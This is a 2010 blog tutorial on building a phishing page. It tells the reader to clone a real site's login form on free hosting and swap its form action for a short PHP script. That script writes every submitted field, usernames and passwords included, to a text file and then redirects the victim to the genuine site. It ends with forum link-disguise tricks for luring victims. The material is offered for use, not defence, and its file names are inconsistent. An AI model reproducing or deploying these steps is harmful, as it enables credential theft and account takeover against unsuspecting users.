CRASHDEX

Tag: phishing php script

Basic Tutorial On How To Make A Phishing Page.

by on Oct.26, 2010, under Website Security

This is a basic tutorial on how to make a phishing page.

Index:
What is a phisher?
Making a webhost Account ?

Getting Web pages Source Code ?
Creating Phish File ?
How to fool people ?

————————
What is a phisher?
————————

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

————————–
Making awebhost Account
————————–

In order to make a phisher, you need a web hosting site. you cn make account on any free web host server. Sign up with a free acount and title it (websiteyourgonnaphish).(something).com For example: myspace.phish.com Most likeley, it is taken so add numbers like 08, or 07.

————————————–
Getting Web Pages Source Code
————————————–

After you create that page, go to the website you will make a phisher for. Open the login page, From there right-click the page, and click View Source. Copy and paste what has popped-up.

————————
Creating Phish File
————————

Once you have that copied, go to your webhost account. Click on “New File” Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

Code:
header("Location: http://www.phisshed-website.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The http://www.phisshed-website.com is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

————————-
How to fool people
————————-
What you do now is disguise your link. Use this code:

Code:
webacount.server.com/login.htm

That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

Code:
[url=xxx.server.com]*real website name*.com/login.php[/url]

You do the same for any forum!

Thank you for reading! Hope it helps! If i was missing something, or you have any questions, mail me!

68 Comments :, , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!